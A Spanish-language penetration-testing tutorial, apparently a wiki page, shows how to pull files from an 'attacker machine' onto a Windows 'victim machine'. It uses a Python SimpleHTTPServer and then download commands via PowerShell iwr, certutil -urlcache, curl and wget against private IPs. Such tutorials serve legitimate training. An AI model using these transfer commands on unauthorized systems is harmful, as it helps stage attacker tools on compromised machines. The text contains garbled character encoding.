Descargando desde Windows
1. Usando Invoke-WebRequest (IWR)
Máquina del Atacante:
Primero, navega al directorio local desde donde vas a subir el archivo a la máquina vĂctima. El comando Python ejecutado con “SimpleHTTPServer” en el puerto 80 crea y inicia instantáneamente el servidor web para acceder y transferir los archivos en el directorio de trabajo actual. Este es uno de los mĂ©todos más sencillos para transferir archivos.
Comando:
python -m SimpleHTTPServer 80Máquina VĂctima:
En la máquina vĂctima, ejecuta el siguiente comando en PowerShell para descargar el archivo desde la máquina atacante.
Comando:
powershell.exe -command iwr -Uri http://192.168.68.68/file.txt -OutFile C:\Temp\fileoutput.txtNota: iwr es la abreviatura de Invoke-WebRequest, que es una parte de la utilidad de Microsoft PowerShell.
También puedes probar con el siguiente comando:
powershell.exe iwr -uri http://192.168.1.2/file.txt -o C:\Temp\fileoutput.txt2. Usando Certutil
El propósito original de certutil era para la gestión de certificados y Autoridades Certificadoras (CA), pero también puede ser utilizado para la transferencia de archivos.
Máquina del Atacante:
Usaremos el mismo SimpleHTTP Server en el puerto 80 en la máquina atacante para enviar el archivo desde ese directorio.
Comando:
python -m SimpleHTTPServer 80Máquina VĂctima:
En la máquina vĂctima, ejecuta el siguiente comando para descargar el archivo desde la máquina atacante.
Comando:
certutil -urlcache -f http://192.168.62.68/file.txt file.txt3. Usando Curl
Curl es una herramienta de lĂnea de comandos en Linux que se utiliza para compartir datos entre servidores y que ahora tambiĂ©n está disponible en cmd de Windows.
Máquina del Atacante:
Usaremos el mismo SimpleHTTP Server en el puerto 80 en la máquina atacante para enviar el archivo desde ese directorio.
Comando:
python -m SimpleHTTPServer 80Máquina VĂctima:
En la máquina vĂctima, ejecuta el siguiente comando para descargar el archivo desde la máquina atacante.
Comando:
curl http://192.168.1.2/file.txt -o fileout.txt4. Usando Wget
La funciĂłn de wget es recuperar contenido desde servidores web disponibles. Ahora vamos a descargar un archivo desde la máquina atacante usando PowerShell en la máquina vĂctima.
Máquina del Atacante:
Ejecuta el SimpleHTTP Server en el puerto 80 en la máquina atacante para enviar el archivo desde ese directorio.
Comando:
python -m SimpleHTTPServer 80Máquina VĂctima:
Abre PowerShell en la máquina Windows y ejecuta el siguiente comando. Menciona la ruta desde la cual descargar el archivo y luego especifica la ruta de salida para guardar el archivo.
Comando:
wget http://192.168.1.2/file.txt -OutFile C:\Temp\fileoutput.txtĂšltima actualizaciĂłn
ÂżTe fue Ăştil?